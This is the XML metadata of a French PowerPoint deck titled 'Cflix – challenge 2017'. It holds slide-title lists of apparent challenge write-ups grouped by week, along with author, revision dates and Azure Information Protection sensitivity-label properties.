  <Paragraphs>266</Paragraphs>
  <Slides>31</Slides>
  <Notes>31</Notes>
  <HiddenSlides>2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Wingdings</vt:lpstr>
      <vt:lpstr>À bandes</vt:lpstr>
      <vt:lpstr>Conception personnalisée</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Cflix – challenge 2017</vt:lpstr>
      <vt:lpstr>SEMAINE #1</vt:lpstr>
      <vt:lpstr>Write-up : Avocat incontestable</vt:lpstr>
      <vt:lpstr>Write-up : Avocat incontestable</vt:lpstr>
      <vt:lpstr>Write-up : Avocat incontestable</vt:lpstr>
      <vt:lpstr>Write-up : Jeu de pouvoir</vt:lpstr>
      <vt:lpstr>Write-up : BugFinder</vt:lpstr>
      <vt:lpstr>Write-up : BugFinder</vt:lpstr>
      <vt:lpstr>Write-up : BugFinder</vt:lpstr>
      <vt:lpstr>Write-up : Dark Reflection</vt:lpstr>
      <vt:lpstr>Write-up : Jeu d’enfant</vt:lpstr>
      <vt:lpstr>Write-up : L’éthique des barmans</vt:lpstr>
      <vt:lpstr>SEMAINE #2</vt:lpstr>
      <vt:lpstr>Write-up : Goût du risque</vt:lpstr>
      <vt:lpstr>Write-up : It’s For Life</vt:lpstr>
      <vt:lpstr>Write-up : It’s For Life</vt:lpstr>
      <vt:lpstr>Write-up : Oh mon dieu ! Ils ont …</vt:lpstr>
      <vt:lpstr>Write-up : Danger Zone</vt:lpstr>
      <vt:lpstr>Write-up : Lu et approuvé</vt:lpstr>
      <vt:lpstr>Write-up : It’s so good man</vt:lpstr>
      <vt:lpstr>SEMAINE #3</vt:lpstr>
      <vt:lpstr>Write-up : We need a genius</vt:lpstr>
      <vt:lpstr>Write-up : La contre-attaque</vt:lpstr>
      <vt:lpstr>Write-up : La vérité éclate</vt:lpstr>
      <vt:lpstr>Write-up : C étrange tout cela</vt:lpstr>
      <vt:lpstr>Write-up : La boucle est bouclée</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Présentation PowerPoint</vt:lpstr>
      <vt:lpstr>Write-up : La contre-attaque</vt:lpstr>
      <vt:lpstr>Write-up : BugFinder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Benoît Garreau</dc:creator>
  <cp:lastModifiedBy>Benoit Garreau</cp:lastModifiedBy>
  <cp:revision>100</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2017-06-19T11:48:18Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2018-04-19T12:49:19Z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70596ad-2b36-4a7e-8ba0-ae3f91e8c922_Enabled">
    <vt:lpwstr>True</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="3" name="MSIP_Label_570596ad-2b36-4a7e-8ba0-ae3f91e8c922_SiteId">
    <vt:lpwstr>34314e6e-4023-4e4b-a15e-143f63244e2b</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="4" name="MSIP_Label_570596ad-2b36-4a7e-8ba0-ae3f91e8c922_Ref">
    <vt:lpwstr>https://api.informationprotection.azure.com/api/34314e6e-4023-4e4b-a15e-143f63244e2b</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="5" name="MSIP_Label_570596ad-2b36-4a7e-8ba0-ae3f91e8c922_SetBy">
    <vt:lpwstr>benoit.garreau@cdbdx.biz</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="6" name="MSIP_Label_570596ad-2b36-4a7e-8ba0-ae3f91e8c922_SetDate">
    <vt:lpwstr>2017-06-26T10:42:00.4890219+02:00</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="7" name="MSIP_Label_570596ad-2b36-4a7e-8ba0-ae3f91e8c922_Name">
    <vt:lpwstr>Public</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="8" name="MSIP_Label_570596ad-2b36-4a7e-8ba0-ae3f91e8c922_Application">
    <vt:lpwstr>Microsoft Azure Information Protection</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="9" name="MSIP_Label_570596ad-2b36-4a7e-8ba0-ae3f91e8c922_Extended_MSFT_Method">
    <vt:lpwstr>Automatic</vt:lpwstr>
  </property>
  <property fmtid="{D5CDD505-2E9C-101B-9397-08002B2CF9AE}" pid="10" name="Sensitivity">
    <vt:lpwstr>Public</vt:lpwstr>
  </property>
</Properties>
</file>